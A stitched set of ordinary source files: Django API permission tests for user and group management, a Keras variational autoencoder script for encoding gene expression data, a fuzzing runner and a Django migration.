self.grant_access(obj=self.test_user, permission=permission_user_delete)
user_count = get_user_model().objects.count()
response = self._request_test_user_delete_api_view()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(get_user_model().objects.count(), user_count - 1)
def test_user_edit_patch_api_view_no_access(self):
self._create_test_user()
user_username = self.test_user.username
response = self._request_test_user_edit_patch_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_user.refresh_from_db()
self.assertEqual(self.test_user.username, user_username)
def test_user_edit_patch_api_view_with_access(self):
self._create_test_user()
self.grant_access(obj=self.test_user, permission=permission_user_edit)
user_username = self.test_user.username
response = self._request_test_user_edit_patch_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_user.refresh_from_db()
self.assertNotEqual(self.test_user.username, user_username)
def test_user_edit_put_api_view_no_access(self):
self._create_test_user()
user_username = self.test_user.username
response = self._request_test_user_edit_put_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_user.refresh_from_db()
self.assertEqual(self.test_user.username, user_username)
def test_user_edit_put_api_view_with_access(self):
self._create_test_user()
self.grant_access(obj=self.test_user, permission=permission_user_edit)
user_username = self.test_user.username
response = self._request_test_user_edit_put_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_user.refresh_from_db()
self.assertNotEqual(self.test_user.username, user_username)
class UserGroupAPITestCase(GroupTestMixin, UserAPITestMixin, UserTestMixin, BaseAPITestCase):
def test_user_create_with_group_api_view_no_permission(self):
self._create_test_group()
user_count = get_user_model().objects.count()
response = self._request_test_user_create_api_view_extra_data()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(get_user_model().objects.count(), user_count)
def test_user_create_with_group_api_view_with_permission(self):
self._create_test_group()
self.grant_permission(permission=permission_user_create)
user_count = get_user_model().objects.count()
response = self._request_test_user_create_api_view_extra_data()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(get_user_model().objects.count(), user_count + 1)
self.test_user.refresh_from_db()
self.assertTrue(self.test_group in self.test_user.groups.all())
def test_user_group_add_api_view_no_permission(self):
self._create_test_user()
self._create_test_group()
user_group_count = self.test_user.groups.count()
response = self._request_test_user_group_add_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_user.refresh_from_db()
self.assertEqual(self.test_user.groups.count(), user_group_count)
def test_user_group_add_api_view_with_user_access(self):
self._create_test_user()
self._create_test_group()
self.grant_access(obj=self.test_user, permission=permission_user_edit)
user_group_count = self.test_user.groups.count()
response = self._request_test_user_group_add_api_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.test_user.refresh_from_db()
self.assertEqual(self.test_user.groups.count(), user_group_count)
def test_user_group_add_api_view_with_group_access(self):
self._create_test_user()
self._create_test_group()
self.grant_access(obj=self.test_group, permission=permission_group_view)
user_group_count = self.test_user.groups.count()
response = self._request_test_user_group_add_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_user.refresh_from_db()
self.assertEqual(self.test_user.groups.count(), user_group_count)
def test_user_group_add_api_view_with_full_access(self):
self._create_test_user()
self._create_test_group()
self.grant_access(obj=self.test_user, permission=permission_user_edit)
self.grant_access(obj=self.test_group, permission=permission_group_view)
user_group_count = self.test_user.groups.count()
response = self._request_test_user_group_add_api_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.test_user.refresh_from_db()
self.assertEqual(self.test_user.groups.count(), user_group_count + 1)
def _create_test_user_with_test_group(self):
self._create_test_group()
self._create_test_user()
self.test_user.groups.add(self.test_group)
def test_user_group_list_no_access(self):
self._create_test_user_with_test_group()
response = self._request_test_user_group_list_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_group_list_with_user_access(self):
self._create_test_user_with_test_group()
self.grant_access(obj=self.test_user, permission=permission_user_view)
response = self._request_test_user_group_list_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 0)
def test_user_group_list_with_group_access(self):
self._create_test_user_with_test_group()
self.grant_access(obj=self.test_group, permission=permission_group_view)
response = self._request_test_user_group_list_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_group_list_with_full_access(self):
self._create_test_user_with_test_group()
self.grant_access(obj=self.test_user, permission=permission_user_view)
self.grant_access(obj=self.test_group, permission=permission_group_view)
response = self._request_test_user_group_list_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 1)
def test_user_login_api_view(self):
self._create_test_user()
self.assertTrue(
self.login(
username=self.test_user.username,
password=self.test_user.cleartext_password
)
)
def test_user_create_login_password_change_api_view_no_access(self):
self._create_test_user()
response = self._request_test_user_password_change_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(
self.login(
username=self.test_user.username,
password=self.test_user.cleartext_password
)
)
def test_user_create_login_password_change_api_view_with_access(self):
self._create_test_user()
self.grant_access(obj=self.test_user, permission=permission_user_edit)
response = self._request_test_user_password_change_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(
self.login(
username=self.test_user.username,
password=self.test_user.cleartext_password
)
)
| 36.437143
| 93
| 0.739748
| 1,668
| 12,753
| 5.168465
| 0.04976
| 0.093725
| 0.05707
| 0.074701
| 0.915439
| 0.907783
| 0.894444
| 0.865793
| 0.83517
| 0.822178
| 0
| 0.008786
| 0.178938
| 12,753
| 349
| 94
| 36.541547
| 0.814535
| 0
| 0
| 0.718615
| 0
| 0
| 0.000784
| 0
| 0
| 0
| 0
| 0
| 0.242424
| 1
| 0.12987
| false
| 0.030303
| 0.030303
| 0
| 0.17316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2866f522e6af8e6eeec851b450432eb020d5cdd
| 26,822
|
py
|
Python
|
scripts/functions/vae.py
|
greenelab/Pseudomonas_latent_spaces
|
0d78dc927a246c49f631abeddc0b952add4c6d0c
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/functions/vae.py
|
greenelab/Pseudomonas_latent_spaces
|
0d78dc927a246c49f631abeddc0b952add4c6d0c
|
[
"BSD-3-Clause"
] | 12
|
2018-07-02T19:35:31.000Z
|
2019-03-09T00:24:09.000Z
|
scripts/functions/vae.py
|
greenelab/Pseudomonas_latent_spaces
|
0d78dc927a246c49f631abeddc0b952add4c6d0c
|
[
"BSD-3-Clause"
] | 1
|
2018-06-25T14:21:51.000Z
|
2018-06-25T14:21:51.000Z
|
# -----------------------------------------------------------------------------------------------------------------------
# By Alexandra Lee
# (updated October 2018)
#
# Encode gene expression data into low dimensional latent space using
# Tybalt with 2-hidden layers
# --------------------------------------------------------------------------------------------------------------------
import os
import argparse
import pandas as pd
import tensorflow as tf
# To ensure reproducibility using Keras during development
# https://keras.io/getting-started/faq/#how-can-i-obtain-reproducible-results-using-keras-during-development
import numpy as np
import random as rn
from keras.layers import Input, Dense, Lambda, Layer, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model, Sequential
from keras import metrics, optimizers
from keras.callbacks import Callback
from functions.helper_ae import sampling_maker, CustomVariationalLayer, WarmUpCallback
def tybalt_2layer_model(
learning_rate,
batch_size,
epochs,
kappa,
intermediate_dim,
latent_dim,
epsilon_std,
base_dir,
analysis_name):
"""
Train 2-layer Tybalt model using input dataset
Output:
Encoding and decoding neural networks to use in downstream analysis
"""
# The below is necessary in Python 3.2.3 onwards to
# have reproducible behavior for certain hash-based operations.
# See these references for further details:
# https://docs.python.org/3.4/using/cmdline.html#envvar-PYTHONHASHSEED
# https://github.com/keras-team/keras/issues/2280#issuecomment-306959926
randomState = 123
import os
os.environ['PYTHONHASHSEED'] = '0'
# The below is necessary for starting Numpy generated random numbers
# in a well-defined initial state.
np.random.seed(42)
# The below is necessary for starting core Python generated random numbers
# in a well-defined state.
rn.seed(12345)
# Force TensorFlow to use single thread.
# Multiple threads are a potential source of
# non-reproducible results.
# For further details, see: https://stackoverflow.com/questions/42022950/which-seeds-have-to-be-set-where-to-realize-100-reproducibility-of-training-res
session_conf = tf.ConfigProto(
intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
from keras import backend as K
# The below tf.set_random_seed() will make random number generation
# in the TensorFlow backend have a well-defined initial state.
# For further details, see: https://www.tensorflow.org/api_docs/python/tf/set_random_seed
tf.set_random_seed(1234)
sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
K.set_session(sess)
# --------------------------------------------------------------------------------------------------------------------
# Files
# --------------------------------------------------------------------------------------------------------------------
data_file = os.path.join(
base_dir, "data", analysis_name, "train_model_input.txt.xz")
rnaseq = pd.read_table(data_file, index_col=0, header=0, compression='xz')
# --------------------------------------------------------------------------------------------------------------------
# Initialize hyper parameters
#
# learning rate:
# batch size: Total number of training examples present in a single batch
# Iterations is the number of batches needed to complete one epoch
# epochs: One Epoch is when an ENTIRE dataset is passed forward and backward through the neural network only ONCE
# kappa: warmup
# original dim: dimensions of the raw data
# latent dim: dimensiosn of the latent space (fixed by the user)
# Note: intrinsic latent space dimension unknown
# epsilon std:
# beta: Threshold value for ReLU?
# --------------------------------------------------------------------------------------------------------------------
original_dim = rnaseq.shape[1]
beta = K.variable(0)
stat_file = os.path.join(base_dir, "stats", analysis_name,
"tybalt_2layer_{}latent_stats.tsv".format(latent_dim))
hist_plot_file = os.path.join(
base_dir, "stats", analysis_name, "tybalt_2layer_{}latent_hist.png".format(latent_dim))
encoded_file = os.path.join(base_dir, "encoded", analysis_name,
"train_input_2layer_{}latent_encoded.txt".format(latent_dim))
model_encoder_file = os.path.join(base_dir, "models", analysis_name,
"tybalt_2layer_{}latent_encoder_model.h5".format(latent_dim))
weights_encoder_file = os.path.join(base_dir, "models", analysis_name,
"tybalt_2layer_{}latent_encoder_weights.h5".format(latent_dim))
model_decoder_file = os.path.join(base_dir, "models", analysis_name,
"tybalt_2layer_{}latent_decoder_model.h5".format(latent_dim))
weights_decoder_file = os.path.join(base_dir, "models", analysis_name,
"tybalt_2layer_{}latent_decoder_weights.h5".format(latent_dim))
# --------------------------------------------------------------------------------------------------------------------
# Data initalizations
# --------------------------------------------------------------------------------------------------------------------
# Split 10% test set randomly
test_set_percent = 0.1
rnaseq_test_df = rnaseq.sample(
frac=test_set_percent, random_state=randomState)
rnaseq_train_df = rnaseq.drop(rnaseq_test_df.index)
# Create a placeholder for an encoded (original-dimensional)
rnaseq_input = Input(shape=(original_dim, ))
# --------------------------------------------------------------------------------------------------------------------
# Architecture of VAE
# --------------------------------------------------------------------------------------------------------------------
# ENCODER
# Input layer is compressed into a mean and log variance vector of size
# `latent_dim`. Each layer is initialized with glorot uniform weights and each
# step (dense connections, batch norm,and relu activation) are funneled
# separately
# Each vector of length `latent_dim` are connected to the rnaseq input tensor
# "z_mean_dense_linear" is the encoded representation of the input
# Take as input arrays of shape (*, original dim) and output arrays of shape (*, latent dim)
# Combine input from previous layer using linear summ
# Normalize the activations (combined weighted nodes of the previous layer)
# Transformation that maintains the mean activation close to 0 and the activation standard deviation close to 1.
# Apply ReLU activation function to combine weighted nodes from previous layer
# relu = threshold cutoff (cutoff value will be learned)
# ReLU function filters noise
# X is encoded using Q(z|X) to yield mu(X), sigma(X) that describes latent space distribution
hidden_dense_linear = Dense(
intermediate_dim, kernel_initializer='glorot_uniform')(rnaseq_input)
hidden_dense_batchnorm = BatchNormalization()(hidden_dense_linear)
hidden_encoded = Activation('relu')(hidden_dense_batchnorm)
# Note:
# Normalize and relu filter at each layer adds non-linear component (relu is non-linear function)
# If architecture is layer-layer-normalization-relu then the computation is still linear
# Add additional layers in triplicate
z_mean_dense_linear = Dense(
latent_dim, kernel_initializer='glorot_uniform')(hidden_encoded)
z_mean_dense_batchnorm = BatchNormalization()(z_mean_dense_linear)
z_mean_encoded = Activation('relu')(z_mean_dense_batchnorm)
z_log_var_dense_linear = Dense(
latent_dim, kernel_initializer='glorot_uniform')(rnaseq_input)
z_log_var_dense_batchnorm = BatchNormalization()(z_log_var_dense_linear)
z_log_var_encoded = Activation('relu')(z_log_var_dense_batchnorm)
# Customized layer
# Returns the encoded and randomly sampled z vector
# Takes two keras layers as input to the custom sampling function layer with a
# latent_dim` output
#
# sampling():
# randomly sample similar points z from the latent normal distribution that is assumed to generate the data,
# via z = z_mean + exp(z_log_sigma) * epsilon, where epsilon is a random normal tensor
# z ~ Q(z|X)
# Note: there is a trick to reparameterize to standard normal distribution so that the space is differentiable and
# therefore gradient descent can be used
#
# Returns the encoded and randomly sampled z vector
# Takes two keras layers as input to the custom sampling function layer with a
# latent_dim` output
z = Lambda(sampling_maker(epsilon_std),
output_shape=(latent_dim, ))([z_mean_encoded, z_log_var_encoded])
# DECODER
# The decoding layer is much simpler with a single layer glorot uniform
# initialized and sigmoid activation
# Reconstruct P(X|z)
decoder_model = Sequential()
decoder_model.add(
Dense(intermediate_dim, activation='relu', input_dim=latent_dim))
decoder_model.add(Dense(original_dim, activation='sigmoid'))
rnaseq_reconstruct = decoder_model(z)
# CONNECTIONS
# fully-connected network
adam = optimizers.Adam(lr=learning_rate)
vae_layer = CustomVariationalLayer(original_dim, z_log_var_encoded, z_mean_encoded, beta)([
rnaseq_input, rnaseq_reconstruct])
vae = Model(rnaseq_input, vae_layer)
vae.compile(optimizer=adam, loss=None, loss_weights=[beta])
# --------------------------------------------------------------------------------------------------------------------
# Training
# --------------------------------------------------------------------------------------------------------------------
# fit Model
# hist: record of the training loss at each epoch
hist = vae.fit(np.array(rnaseq_train_df), shuffle=True, epochs=epochs, batch_size=batch_size,
validation_data=(np.array(rnaseq_test_df), None),
callbacks=[WarmUpCallback(beta, kappa)])
# --------------------------------------------------------------------------------------------------------------------
# Use trained model to make predictions
# --------------------------------------------------------------------------------------------------------------------
encoder = Model(rnaseq_input, z_mean_encoded)
encoded_rnaseq_df = encoder.predict_on_batch(rnaseq)
encoded_rnaseq_df = pd.DataFrame(encoded_rnaseq_df, index=rnaseq.index)
encoded_rnaseq_df.columns.name = 'sample_id'
encoded_rnaseq_df.columns = encoded_rnaseq_df.columns + 1
# --------------------------------------------------------------------------------------------------------------------
# Visualize training performance
# --------------------------------------------------------------------------------------------------------------------
history_df = pd.DataFrame(hist.history)
ax = history_df.plot()
ax.set_xlabel('Epochs')
ax.set_ylabel('VAE Loss')
fig = ax.get_figure()
fig.savefig(hist_plot_file)
del ax, fig
# --------------------------------------------------------------------------------------------------------------------
# Output
# --------------------------------------------------------------------------------------------------------------------
# Save training performance
history_df = pd.DataFrame(hist.history)
history_df = history_df.assign(learning_rate=learning_rate)
history_df = history_df.assign(batch_size=batch_size)
history_df = history_df.assign(epochs=epochs)
history_df = history_df.assign(kappa=kappa)
history_df.to_csv(stat_file, sep='\t', index=False)
# Save latent space representation
encoded_rnaseq_df.to_csv(encoded_file, sep='\t')
# Save models
# (source) https://machinelearningmastery.com/save-load-keras-deep-learning-models/
# Save encoder model
encoder.save(model_encoder_file)
# serialize weights to HDF5
encoder.save_weights(weights_encoder_file)
# Save decoder model
# (source) https://github.com/greenelab/tybalt/blob/master/scripts/nbconverted/tybalt_vae.py
# can generate from any sampled z vector
decoder_input = Input(shape=(latent_dim, ))
_x_decoded_mean = decoder_model(decoder_input)
decoder = Model(decoder_input, _x_decoded_mean)
decoder.save(model_decoder_file)
# serialize weights to HDF5
decoder.save_weights(weights_decoder_file)
# Save weight matrix: how each gene contribute to each feature
# build a generator that can sample from the learned distribution
# can generate from any sampled z vector
decoder_input = Input(shape=(latent_dim, ))
x_decoded_mean = decoder_model(decoder_input)
decoder = Model(decoder_input, x_decoded_mean)
weights = []
for layer in decoder.layers:
weights.append(layer.get_weights())
# Multiply hidden layers together to obtain a single representation of gene weights
intermediate_weight_df = pd.DataFrame(weights[1][0])
hidden_weight_df = pd.DataFrame(weights[1][2])
abstracted_weight_df = intermediate_weight_df.dot(hidden_weight_df)
abstracted_weight_df.index = range(0, latent_dim)
abstracted_weight_df.columns = rnaseq.columns
weight_file = os.path.join(
base_dir, "data", analysis_name, "VAE_weight_matrix.txt")
abstracted_weight_df.to_csv(weight_file, sep='\t')
def tybalt_2layer_model_multi(
learning_rate,
batch_size,
epochs,
kappa,
intermediate_dim,
latent_dim,
epsilon_std,
base_dir,
analysis_name,
seed_input):
"""
Train 2-layer Tybalt model using input dataset
Output:
Encoding and decoding neural networks to use in downstream analysis
"""
# The below is necessary in Python 3.2.3 onwards to
# have reproducible behavior for certain hash-based operations.
# See these references for further details:
# https://docs.python.org/3.4/using/cmdline.html#envvar-PYTHONHASHSEED
# https://github.com/keras-team/keras/issues/2280#issuecomment-306959926
randomState = seed_input
import os
os.environ['PYTHONHASHSEED'] = '0'
# The below is necessary for starting Numpy generated random numbers
# in a well-defined initial state.
np.random.seed(seed_input)
# The below is necessary for starting core Python generated random numbers
# in a well-defined state.
rn.seed(seed_input)
# Force TensorFlow to use single thread.
# Multiple threads are a potential source of
# non-reproducible results.
# For further details, see: https://stackoverflow.com/questions/42022950/which-seeds-have-to-be-set-where-to-realize-100-reproducibility-of-training-res
session_conf = tf.ConfigProto(
intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
from keras import backend as K
# The below tf.set_random_seed() will make random number generation
# in the TensorFlow backend have a well-defined initial state.
# For further details, see: https://www.tensorflow.org/api_docs/python/tf/set_random_seed
tf.set_random_seed(seed_input)
sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
K.set_session(sess)
# --------------------------------------------------------------------------------------------------------------------
# Files
# --------------------------------------------------------------------------------------------------------------------
data_file = os.path.join(
base_dir, "data", analysis_name, "train_model_input_seed" + str(seed_input) + ".txt.xz")
rnaseq = pd.read_table(data_file, index_col=0, header=0, compression='xz')
# --------------------------------------------------------------------------------------------------------------------
# Initialize hyper parameters
#
# learning rate:
# batch size: Total number of training examples present in a single batch
# Iterations is the number of batches needed to complete one epoch
# epochs: One Epoch is when an ENTIRE dataset is passed forward and backward through the neural network only ONCE
# kappa: warmup
# original dim: dimensions of the raw data
# latent dim: dimensiosn of the latent space (fixed by the user)
# Note: intrinsic latent space dimension unknown
# epsilon std:
# beta: Threshold value for ReLU?
# --------------------------------------------------------------------------------------------------------------------
original_dim = rnaseq.shape[1]
beta = K.variable(0)
stat_file = os.path.join(base_dir, "stats", analysis_name,
"tybalt_2layer_latent_stats_seed" + str(seed_input) + ".tsv")
hist_plot_file = os.path.join(
base_dir, "stats", analysis_name, "tybalt_2layer_latent_hist_seed" + str(seed_input) + ".png")
encoded_file = os.path.join(base_dir, "encoded", analysis_name,
"train_input_2layer_latent_encoded_seed" + str(seed_input) + ".txt")
model_encoder_file = os.path.join(base_dir, "models", analysis_name,
"tybalt_2layer_latent_encoder_model_seed" + str(seed_input) + ".h5")
weights_encoder_file = os.path.join(base_dir, "models", analysis_name,
"tybalt_2layer_latent_encoder_weights_seed" + str(seed_input) + ".h5")
model_decoder_file = os.path.join(base_dir, "models", analysis_name,
"tybalt_2layer_latent_decoder_model_seed" + str(seed_input) + ".h5")
weights_decoder_file = os.path.join(base_dir, "models", analysis_name,
"tybalt_2layer_latent_decoder_weights_seed" + str(seed_input) + ".h5")
# --------------------------------------------------------------------------------------------------------------------
# Data initalizations
# --------------------------------------------------------------------------------------------------------------------
# Split 10% test set randomly
test_set_percent = 0.1
rnaseq_test_df = rnaseq.sample(
frac=test_set_percent, random_state=randomState)
rnaseq_train_df = rnaseq.drop(rnaseq_test_df.index)
# Create a placeholder for an encoded (original-dimensional)
rnaseq_input = Input(shape=(original_dim, ))
# --------------------------------------------------------------------------------------------------------------------
# Architecture of VAE
# --------------------------------------------------------------------------------------------------------------------
# ENCODER
# Input layer is compressed into a mean and log variance vector of size
# `latent_dim`. Each layer is initialized with glorot uniform weights and each
# step (dense connections, batch norm,and relu activation) are funneled
# separately
# Each vector of length `latent_dim` are connected to the rnaseq input tensor
# "z_mean_dense_linear" is the encoded representation of the input
# Take as input arrays of shape (*, original dim) and output arrays of shape (*, latent dim)
# Combine input from previous layer using linear summ
# Normalize the activations (combined weighted nodes of the previous layer)
# Transformation that maintains the mean activation close to 0 and the activation standard deviation close to 1.
# Apply ReLU activation function to combine weighted nodes from previous layer
# relu = threshold cutoff (cutoff value will be learned)
# ReLU function filters noise
# X is encoded using Q(z|X) to yield mu(X), sigma(X) that describes latent space distribution
hidden_dense_linear = Dense(
intermediate_dim, kernel_initializer='glorot_uniform')(rnaseq_input)
hidden_dense_batchnorm = BatchNormalization()(hidden_dense_linear)
hidden_encoded = Activation('relu')(hidden_dense_batchnorm)
# Note:
# Normalize and relu filter at each layer adds non-linear component (relu is non-linear function)
# If architecture is layer-layer-normalization-relu then the computation is still linear
# Add additional layers in triplicate
z_mean_dense_linear = Dense(
latent_dim, kernel_initializer='glorot_uniform')(hidden_encoded)
z_mean_dense_batchnorm = BatchNormalization()(z_mean_dense_linear)
z_mean_encoded = Activation('relu')(z_mean_dense_batchnorm)
z_log_var_dense_linear = Dense(
latent_dim, kernel_initializer='glorot_uniform')(rnaseq_input)
z_log_var_dense_batchnorm = BatchNormalization()(z_log_var_dense_linear)
z_log_var_encoded = Activation('relu')(z_log_var_dense_batchnorm)
# Customized layer
# Returns the encoded and randomly sampled z vector
# Takes two keras layers as input to the custom sampling function layer with a
# latent_dim` output
#
# sampling():
# randomly sample similar points z from the latent normal distribution that is assumed to generate the data,
# via z = z_mean + exp(z_log_sigma) * epsilon, where epsilon is a random normal tensor
# z ~ Q(z|X)
# Note: there is a trick to reparameterize to standard normal distribution so that the space is differentiable and
# therefore gradient descent can be used
#
# Returns the encoded and randomly sampled z vector
# Takes two keras layers as input to the custom sampling function layer with a
# latent_dim` output
z = Lambda(sampling_maker(epsilon_std),
output_shape=(latent_dim, ))([z_mean_encoded, z_log_var_encoded])
# DECODER
# The decoding layer is much simpler with a single layer glorot uniform
# initialized and sigmoid activation
# Reconstruct P(X|z)
decoder_model = Sequential()
decoder_model.add(
Dense(intermediate_dim, activation='relu', input_dim=latent_dim))
decoder_model.add(Dense(original_dim, activation='sigmoid'))
rnaseq_reconstruct = decoder_model(z)
# CONNECTIONS
# fully-connected network
adam = optimizers.Adam(lr=learning_rate)
vae_layer = CustomVariationalLayer(original_dim, z_log_var_encoded, z_mean_encoded, beta)([
rnaseq_input, rnaseq_reconstruct])
vae = Model(rnaseq_input, vae_layer)
vae.compile(optimizer=adam, loss=None, loss_weights=[beta])
# --------------------------------------------------------------------------------------------------------------------
# Training
# --------------------------------------------------------------------------------------------------------------------
# fit Model
# hist: record of the training loss at each epoch
hist = vae.fit(np.array(rnaseq_train_df), shuffle=True, epochs=epochs, batch_size=batch_size,
validation_data=(np.array(rnaseq_test_df), None),
callbacks=[WarmUpCallback(beta, kappa)])
# --------------------------------------------------------------------------------------------------------------------
# Use trained model to make predictions
# --------------------------------------------------------------------------------------------------------------------
encoder = Model(rnaseq_input, z_mean_encoded)
encoded_rnaseq_df = encoder.predict_on_batch(rnaseq)
encoded_rnaseq_df = pd.DataFrame(encoded_rnaseq_df, index=rnaseq.index)
encoded_rnaseq_df.columns.name = 'sample_id'
encoded_rnaseq_df.columns = encoded_rnaseq_df.columns + 1
# --------------------------------------------------------------------------------------------------------------------
# Visualize training performance
# --------------------------------------------------------------------------------------------------------------------
history_df = pd.DataFrame(hist.history)
ax = history_df.plot()
ax.set_xlabel('Epochs')
ax.set_ylabel('VAE Loss')
fig = ax.get_figure()
fig.savefig(hist_plot_file)
del ax, fig
# --------------------------------------------------------------------------------------------------------------------
# Output
# --------------------------------------------------------------------------------------------------------------------
# Save training performance
history_df = pd.DataFrame(hist.history)
history_df = history_df.assign(learning_rate=learning_rate)
history_df = history_df.assign(batch_size=batch_size)
history_df = history_df.assign(epochs=epochs)
history_df = history_df.assign(kappa=kappa)
history_df.to_csv(stat_file, sep='\t', index=False)
# Save latent space representation
encoded_rnaseq_df.to_csv(encoded_file, sep='\t')
# Save models
# (source) https://machinelearningmastery.com/save-load-keras-deep-learning-models/
# Save encoder model
encoder.save(model_encoder_file)
# serialize weights to HDF5
encoder.save_weights(weights_encoder_file)
# Save decoder model
# (source) https://github.com/greenelab/tybalt/blob/master/scripts/nbconverted/tybalt_vae.py
# can generate from any sampled z vector
decoder_input = Input(shape=(latent_dim, ))
_x_decoded_mean = decoder_model(decoder_input)
decoder = Model(decoder_input, _x_decoded_mean)
decoder.save(model_decoder_file)
# serialize weights to HDF5
decoder.save_weights(weights_decoder_file)
# Save weight matrix: how each gene contribute to each feature
# build a generator that can sample from the learned distribution
# can generate from any sampled z vector
decoder_input = Input(shape=(latent_dim, ))
x_decoded_mean = decoder_model(decoder_input)
decoder = Model(decoder_input, x_decoded_mean)
weights = []
for layer in decoder.layers:
weights.append(layer.get_weights())
# Multiply hidden layers together to obtain a single representation of gene weights
intermediate_weight_df = pd.DataFrame(weights[1][0])
hidden_weight_df = pd.DataFrame(weights[1][2])
abstracted_weight_df = intermediate_weight_df.dot(hidden_weight_df)
abstracted_weight_df.index = range(0, latent_dim)
abstracted_weight_df.columns = rnaseq.columns
weight_file = os.path.join(
base_dir, "data", analysis_name, "VAE_weight_matrix_seed" + str(seed_input) + ".txt")
abstracted_weight_df.to_csv(weight_file, sep='\t')
| 45.771331
| 156
| 0.604504
| 3,048
| 26,822
| 5.109252
| 0.139108
| 0.020227
| 0.011558
| 0.016182
| 0.947602
| 0.942465
| 0.93797
| 0.935658
| 0.935658
| 0.935658
| 0
| 0.006593
| 0.180039
| 26,822
| 585
| 157
| 45.849573
| 0.701496
| 0.498024
| 0
| 0.822785
| 0
| 0
| 0.073184
| 0.046261
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008439
| false
| 0
| 0.067511
| 0
| 0.075949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2bfe304f7a9b11218f295d33188fa457cc18063
| 195
|
py
|
Python
|
fuzzing/run_fuzzing.py
|
jrs1061/wheatley
|
bd1143413495ef317970b9c6cedbc4903fdbf7a9
|
[
"MIT"
] | 14
|
2020-08-16T21:41:13.000Z
|
2021-07-13T01:15:01.000Z
|
fuzzing/run_fuzzing.py
|
jrs1061/wheatley
|
bd1143413495ef317970b9c6cedbc4903fdbf7a9
|
[
"MIT"
] | 121
|
2020-08-13T16:54:46.000Z
|
2021-09-17T10:32:04.000Z
|
fuzzing/run_fuzzing.py
|
Kneasle/wheatley
|
9141bf8511dce737208731e55bfe138d48845319
|
[
"MIT"
] | 10
|
2020-12-20T03:52:47.000Z
|
2021-11-22T14:46:15.000Z
|
from .call_parsing import fuzz_parse_call
from .peal_speed_parsing import fuzz_parse_peal_speed
def run():
"""Run all the fuzzing tests"""
fuzz_parse_call()
fuzz_parse_peal_speed()
| 21.666667
| 53
| 0.764103
| 30
| 195
| 4.533333
| 0.466667
| 0.264706
| 0.25
| 0.323529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158974
| 195
| 8
| 54
| 24.375
| 0.829268
| 0.128205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d2ca0a90f6de23d48539ecf5eee14f219c2f95a8
| 12,447
|
py
|
Python
|
app/migrations/0007_auto_20171002_1559.py
|
minerva22/mf-dataentry
|
ef95e2b7acf8ede83048f41079c46b07ec93a3cc
|
[
"MIT"
] | null | null | null |
app/migrations/0007_auto_20171002_1559.py
|
minerva22/mf-dataentry
|
ef95e2b7acf8ede83048f41079c46b07ec93a3cc
|
[
"MIT"
] | null | null | null |
app/migrations/0007_auto_20171002_1559.py
|
minerva22/mf-dataentry
|
ef95e2b7acf8ede83048f41079c46b07ec93a3cc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 15:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0006_auto_20171002_1236'),
]
operations = [
migrations.AlterField(
model_name='currency',
name='code_dub',
field=models.CharField(blank=True, max_length=2, null=True, unique=True),
),
migrations.AlterField(
model_name='currency',
name='code_leb',
field=models.CharField(blank=True, max_length=2, null=True, unique=True),
),
migrations.AlterField(
model_name='nationality',
name='code_dub',
field=models.CharField(blank=True, max_length=10, null=True, unique=True),
),
migrations.AlterField(
model_name='nationality',
name='code_leb',
field=models.CharField(blank=True, max_length=10, null=True, unique=True),
),
migrations.AlterField(
model_name='securitybond',
name='asset_allocation',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='bank_reference',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securitybond',
name='category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='deposit_place',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securitybond',
name='designation',
